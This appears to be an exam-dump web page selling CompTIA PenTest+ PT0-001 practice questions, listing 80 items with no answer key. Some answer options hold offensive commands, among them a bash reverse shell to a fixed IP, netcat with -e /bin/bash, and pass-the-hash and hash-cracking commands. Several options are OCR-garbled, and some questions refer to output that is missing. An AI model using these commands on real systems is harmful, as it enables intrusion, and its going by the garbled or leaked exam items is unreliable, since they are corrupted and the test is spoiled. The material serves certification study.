CompTIA PenTest+ Certification PT0-001 Exam Questions Updated

Everyone wants to know the key to pass the CompTIA PenTest+ Certification PT0-001 exam in the first attempt. PassQuestion new updated CompTIA PenTest+ Certification PT0-001 Exam Questions will guide you on how you can clear the CompTIA PenTest+ Certification exam without putting in much effort. With the high-quality and high accuracy of CompTIA PenTest+ Certification PT0-001 Exam Questions, you can pass the PT0-001 CompTIA PenTest+ exam test with ease.

Test Online CompTIA PenTest+ PT0-001 Free Questions

1. In which of the following scenarios would a tester perform a Kerberoasting attack?

The tester has compromised a Windows device and dumps the LSA secrets.

The tester needs to retrieve the SAM database and crack the password hashes.

The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

2. A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.

Which of the following controls would BEST mitigate the vulnerability?

Implement authorization checks.

Sanitize all the user input.

Prevent directory traversal.

Add client-side security controls

3. A penetration tester is performing an annual security assessment for a repeat client. The tester finds indicators of previous compromise.

Which of the following would be the most logical steps to follow NEXT?

Report the incident to the tester’s immediate manager and follow up with the client immediately

Report the incident to the clients Chief Information Security Officer (CISO) immediately and alter the terms of engagement accordingly

Report the incident to the client’s legal department and then follow up with the client’s security operations team

Make note of the anomaly, continue with the penetration testing and detail it in the final report

4. A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.

Which of the following is the MOST efficient to utilize?

nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

nslookup -ns 8.8.8.8 << dnslist.txt

for x in (1…254); do dig -x 192.168. $x. $x; done

dig -r > echo “8.8.8.8” >> /etc/resolv/conf

5. After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester’s workstation.

Which of the following can be used to escape the limited shell and create a fully functioning TTY?

per1 -e ‘ : set shall=/bin/bash:shell’

php -r ,Sshell=f3hellopen("/bin/bash-);exec($9he:i)’

bash -i >fi /dev/localhosc Oil

python -c ‘import pty;pcy.3pawn("/bin/bash")’

6. While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

Levels of difficulty to exploit identified vulnerabilities

Time taken to accomplish each step

Risk tolerance of the organization

Availability of patches and remediations

7. A penetration tester has run multiple vulnerability scans against a target system.

Which of the following would be unique to a credentialed scan?

Exploits for vulnerabilities found

Detailed service configurations

Unpatched third-party software

Weak access control configurations

8. At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server.

Which of the following BEST describes the technique that was used to obtain this information?

Enumeration of services

OSINT gathering

Port scanning

Social engineering

9. When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Additional rate

Company policy

Impact tolerance

Industry type

10. A penetration tester runs the following on a machine:

Which of the following will be returned?

11. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr Cxr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path “/home/user’. Then run changepass

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’

12. An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing.

Which of the following is MOST likely preventing proxying of all traffic?

Misconfigured routes

Certificate pinning

Strong cipher suites

Closed ports

13. Which of the following excerpts would come from a corporate policy?

Employee passwords must contain a minimum of eight characters, with one being alphanumeric.

The help desk can be reached at 800-passwd1 to perform password resets.

Employees must use strong passwords for accessing corporate assets.

The corporate systems must store passwords using the MD5 hashing algorithm.

14. A client asks a penetration tester to add more addresses to a test currently in progress.

Which of the following would defined the target list?

Rules of engagement

Master services agreement

Statement of work

End-user license agreement

15. A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

✑ Code review

✑ Updates to firewall settings

Which of the following has occurred in this situation?

Scope creep

Post-mortem review

Risk acceptance

Threat prevention

16. A penetration tester wants to check manually if a “ghost” vulnerability exists in a system.

Which of the following methods is the correct way to validate the vulnerability?

Download the GHOST file to a Linux system and compilegcc -o GHOSTtest i:./GHOST

Download the GHOST file to a Windows system and compilegcc -o GHOST GHOS

ctest i:./GHOST

Download the GHOST file to a Linux system and compilegcc -o GHOS

ctest i:./GHOST

Download the GHOST file to a Windows system and compilegcc -o GHOSTtest i:./GHOST

17. A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443.

The penetration tester observes the following output:

Which of the following has MOST likely occurred?

The scan results were a false positive.

The IPS is blocking traffic to port 443

A mismatched firewall rule is blocking 443.

The organization moved services to port 8443

18. A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities.

Under such circumstances, which of the following would be the BEST suggestion for the client?

Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

Identify the issues that can be remediated most quickly and address them first.

Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities

Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

19. During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function.

Which of the following mitigations is BEST for the consultant to conduct?

Update to the latest Microsoft Windows O

Put the machine behind the WA

Segment the machine from the main network.

Disconnect the machine.

20. Which of the following is the purpose of an NDA?

Outlines the terms of confidentiality between both parties

Outlines the boundaries of which systems are authorized for testing

Outlines the requirements of technical testing that are allowed

Outlines the detailed configuration of the network

21. After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host.

Which of the following is the MOST likely cause?

Services are not listening

The network administrator shut down services

The host was not reachable

A firewall/IPS blocked the scan

22. A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application.

Before beginning to test the application, which of the following should the assessor request from the organization?

Sample SOAP messages

The REST API documentation

A protocol fuzzing utility

An applicable XSD file

23. DRAG DROP

A technician is reviewing the following report.

Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability that is a false positive.

24. A tester has determined that null sessions are enabled on a domain controller.

Which of the following attacks can be performed to leverage this vulnerability?

RID cycling to enumerate users and groups

Pass the hash to relay credentials

Password brute forcing to log into the host

Session hijacking to impersonate a system account

25. A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.

Which of the following commands should the tester run on the compromised system?

nc looalhot 4423

nc -nvlp 4423 -« /bin/bash

nc 10.0.0.1 4423

nc 127.0.0.1 4423 -e /bin/bash

26. A constant wants to scan all the TCP Pots on an identified device.

Which of the following Nmap switches will complete this task?

-p-

-p ALX,

-p 1-65534

-port 1-65534

27. While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

28. Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

Lockpicking

Egress sensor triggering

Lock bumping

Lock bypass

29. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.

Which of the following BEST describes the reasoning for this?

Manufacturers developing IoT devices are less concerned with security.

It is difficult for administrators to implement the same security standards across the board.

IoT systems often lack the hardware power required by more secure solutions.

Regulatory authorities often have lower security requirements for IoT systems.

30. During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:

c: creditcards.db>c:winitsystem32calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

Hierarchical file system

Alternate data streams

Backdoor success

Extended file system

31. An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization’s server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack.

Which of the following actions should the penetration tester take?

Attempt to use the remnant tools to achieve persistence

Document the presence of the left-behind tools in the report and proceed with the test

Remove the tools from the affected systems before continuing on with the test

Discontinue further testing and report the situation to management

32. After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine.

Which of the following methods would be MOST easily detected?

Run a zero-day exploit.

Create a new domain user with a known password.

Modify a known boot time service to instantiate a call back.

Obtain cleartext credentials of the compromised user.

33. A penetration tester is scanning a network for SSH and has a list of provided targets.

Which of the following Nmap commands should the tester use?

nmap -p 22 -iL targets

nmap -p 22 -sL targets

nmap -p 22 -oG targets

nmap -p 22 -oA targets

34. After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker’s actual fingerprint without exploitation.

Which of the following is the MOST likely explanation of what happened?

The biometric device is tuned more toward false positives

The biometric device is configured more toward true negatives

The biometric device is set to fail closed

The biometnc device duplicated a valid user’s fingerpnnt.

35. In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

Common libraries

Configuration files

Sandbox escape

ASLR bypass

36. While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path.

To exploit this vulnerability, which of the following criteria must be met?

Permissions not disabled in the DLL

Weak folder permissions of a directory in the DLL search path

Write permissions in the C:WindowsSystem32imports directory

DLL not cryptographically signed by the vendor

37. A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1.

Immediately after running the command below, the penetration tester’s SSH connection to the testing platform drops:

Which of the following ettercap commands should the penetration tester use in the future to

perform ARP spoofing while maintaining a reliable connection?

# sudo ettercap CTq Cw output.cap CM ARP /192.168.1.0/ /192.168.1.255/

# proxychains ettercap CTq Cw output.cap CM ARP /192.168.1.13/ /192.168.1.1/

# ettercap CTq Cw output.cap CM ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80

# ettercap CCsafe-mode CTq Cw output.cap CM ARP /192.168.1.2C 255/ /192.168.1.13/

# ettercap CTq Cw output.cap CM ARP /192.168.1.2C12;192.168.1.14C 255/ /192.168.1.1/

38. A penetration tester successfully exploits a system, receiving a reverse shell.

Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

background

hashdump

session

getuid

psexec

39. A penetration tester is performing a wireless penetration test.

Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Deauthentication attacks against an access point can allow an opportunity to capture the four-way
handshake, which can be used to obtain and crack the encrypted password.

Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point.

Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point.

Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.

40. Which of the following is the reason why a penetration tester would run the chkconfig –del service name command at the end of an engagement?

To remove the persistence

To enable penitence

To report persistence

To check for persistence

41. A client requests that a penetration tester emulate a help desk technician who was recently laid off.

Which of the following BEST describes the abilities of the threat actor?

Advanced persistent threat

Script kiddie

Hacktivist

Organized crime

42. A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication.

Which of the following attacks is MOST likely to succeed in creating a physical effect?

DNS cache poisoning

Record and replay

Supervisory server SMB

Blind SQL injection

43. A penetration tester wants to check manually if a “ghost” vulnerability exists in a system.

Which of the following methods is the correct way to validate the vulnerability?

Download the GHOST file to a Linux system and compile
gcc -o GHOST
test i:
./GHOST

Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOS

c
test i:
./GHOST

Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOS

c
test i:
./GHOST

Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST

44. A penetration tester calls human resources and begins asking open-ended questions.

Which of the following social engineering techniques is the penetration tester using?

Interrogation

Elicitation

Impersonation

Spear phishing

45. Which of the following reasons does penetration tester needs to have a customer’s point-of -contact information available at all time? (Select THREE).

To report indicators of compromise

To report findings that cannot be exploited

To report critical findings

To report the latest published exploits

To update payment information

To report a server that becomes unresponsive

To update the statement o( work

To report a cracked password

46. A company has engaged a penetration tester to perform an assessment for an application that resides in the company’s DMZ.

Prior to conducting testing, in which of the following solutions should the penetration tester’s IP address be whitelisted?

WAF

HIDS

NIDS

DLP

47. During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network.

Which of the following tools could be used to impersonate network resources and collect authentication requests?

Ettercap

Tcpdump

Responder

Medusa

48. A client’s systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory.

Which of the following is the penetration tester’s BEST course of action?

Send the report since the systems administrator will be in charge of implementing the fixes.

Send the report and carbon copy the point of contact/signatory for visibility.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

Forward the request to the point of contact/signatory for authorization.

49. A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information.

Which of the following is the MOST effective way to notify management of this finding and its importance?

Document Ihe findtngs with an executive summary, recommendations, and screenshots of the web apphcation disclosure.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.

Notify the development team of the discovery and suggest that input validation be implemented on the web application’s SQL query strings.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

50. A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

nc -nlvp 443

nc 10.2.4.6. 443

nc -w3 10.2.4.6 443

nc -e /bin/sh 10.2.4.6. 443

51. Which of the following has a direct and significant impact on the budget of the security assessment?

Scoping

Scheduling

Compliance requirement

Target risk

52. During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

Which of the following Medusa commands would potentially provide better results?

#medusa -h hosts.txt -U usera.txt -P hashes, txt -M smbnt. -m GROP: LOCAL -O out.txt – m PASS: HASH

#medusa -H hosts.txt -U users, txt -P hashes, txt -M smbnt -m PASS: HASH -o out. txt

#medusa -H hosts.txt -u WrkStnAdmin -p aa3b435b51404eeaa3b435b51404ee:4e63c1b137e274dda214154b349fe316 -M smbnt -m GROUP: DOMAIN -o out.txt

#medusa -H hosts.txt -C creds.txt -M mssq1 -m GROUP: DOMAIN -o out.txt

53. A client has scheduled a wireless penetration test.

Which of the following describes the scoping target information MOST likely needed before testing can begin?

The physical location and network ESSIDs to be tested

The number of wireless devices owned by the client

The client’s preferred wireless access point vendor

The bands and frequencies used by the client’s devices

54. Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

Stack pointer register

Index pointer register

Stack base pointer

Destination index register

55. A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Obsolete software may contain exploitable components

Weak password management practices may be employed

Cryptographically weak protocols may be intercepted

Web server configurations may reveal sensitive information

56. DRAG DROP

Performance based

You are a penetration Inter reviewing a client’s website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

57. A senior employee received a suspicious email from another executive requesting an urgent wire transfer.

Which of the following types of attacks is likely occurring?

Spear phishing

Business email compromise

Vishing

Whaling

58. Black box penetration testing strategy provides the tester with:

a target list

a network diagram

source code

privileged credentials

59. Which of the following is the MOST comprehensive type of penetration test on a network?

Black box

White box

Gray box

Red team

Architecture review

60. When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client’s systems?

The proposed mitigations and remediations in the final report do not include a cost-benefit analysis.

The NDA protects the consulting firm from future liabilities in the event of a breach.

The assessment reviewed the cyber key terrain and most critical assets of the client’s network.

The penetration test is based on the state of the system and its configuration at the time of assessment.

61. A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?

hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt

hashcax -m 500 hash.txt

hashc&t -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a

hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt

62. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Part2

63. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

Shodan

SET

BeEF

Wireshark

Maltego

Dynamo

64. Which of the following tools is used to perform a credential brute force attack?

Hydra

John the Ripper

Hashcat

Peach

65. A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals.

Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

Cleartext exposure of SNMP trap data

Software bugs resident in the IT ticketing system

S/MIME certificate templates defined by the CA

Health information communicated over HTTP

DAR encryption on records servers

66. A file contains several hashes.

Which of the following can be used in a pass-the-hash attack?

NTLMv2

Kerberos

NTLMv1

LMv2

NTLM

67. A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network.

Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?

Removing shells

Obtaining client acceptance

Removing tester-created credentials

Documenting lessons learned

Presenting attestation of findings

68. A penetration tester obtained access to an internal host of a given target.

Which of the following is the BEST tool to retrieve the passwords of users of the machine exploiting a well-knows architecture flaw of the Windows OS?

Mimikatz

John the Ripper

RainCrack

Hashcat

69. A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles.

For which of the following types of attack would this information be used?

Exploit chaining

Session hijacking

Dictionary

Karma

70. A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

SQL injection

Session hijacking

Command injection

XSS/XSRF

71. A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes.

Which of the following has MOST likely occurred?

The badge was cloned.

The physical access control server is malfunctioning.

The system reached the crossover error rate.

The employee lost the badge.

72. A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:

Which of the following should be performed to escalate the privileges?

Kerberoasting

Retrieval of the SAM database

Migration of the shell to another process

Writable services

73. A client needs to be PCI compliant and has external-facing web servers.

Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

2.9

3.0

4.0

5.9

74. A consultant is identifying versions of Windows operating systems on a network.

Which of the following Nmap commands should the consultant run?

nmap -T4 -v -sU -iL /tmp/list.txt -Pn ―script smb-system-info

nmap -T4 -v -iL /tmp/list .txt -Pn ―script smb-os-disccvery

nmap -T4 -v -6 -iL /tmp/liat.txt -Pn ―script smb-os-discovery -p 135-139

nmap -T4 -v ―script smb-system-info 192.163.1.0/24

75. Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

The tester discovers personally identifiable data on the system

The system shows evidence of prior unauthorized compromise

The system shows a lack of hardening throughout

The system becomes unavailable following an attempted exploit

The tester discovers a finding on an out-of-scope system

76. An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable.

Which of the following is a relevant approach to test this?

Null sessions

Xmas scan

ICMP flood

SYN flood

77. A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope.

The penetration tester is not receiving any response on the command:

nmap 100.100/1/0-125

Which of the following commands would be BEST to return results?

nmap -Pn -sT 100.100.1.0-125

nmap -sF -p 100.100.1.0-125

nmap -sV -oA output 100.100.10-125

nmap 100.100.1.0-125 -T4

78. A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10.

Which of the following would accomplish this task?

From the remote computer, run the following commands:
Export IHOST 192.168.1.10:0.0
xhost+
Terminal

From the local computer, run the following command ssh -L4444 : 127.0.01:6000 -% [email protected] xterm

From the local computer, run the following command
ssh -r6000 : 127.0.01:4444 -p 6000 [email protected] “xhost+; xterm”

From the local computer, run the following command Nc -1 -p 6000
Then, from the remote computer, run the following command Xterm | nc 192.168.1.10 6000

79. Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

wmic environment get name, variablevalue, username / findstr /i “Path” | findstr /i “service”

wmic service get /format:hform > c:tempservices.html

wmic startup get caption, location, command | findstr /i “service” | findstr /v /i “%”

wmic service get name, displayname, patchname, startmode | findstr /i “auto” | findstr /i /v “c:windows\” | findstr /i /v “””

80. An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.

Which of the following attack vectors would the attacker MOST likely use?

Capture a three-way handshake and crack it

Capture a mobile device and crack its encryption

Create a rogue wireless access point

Capture a four-way handshake and crack it

Question 1 of 80

CompTIA PenTest+ Certification PT0-001 Exam Questions Updated

Test Online CompTIA PenTest+ PT0-001 Free Questions

Leave a Reply Cancel reply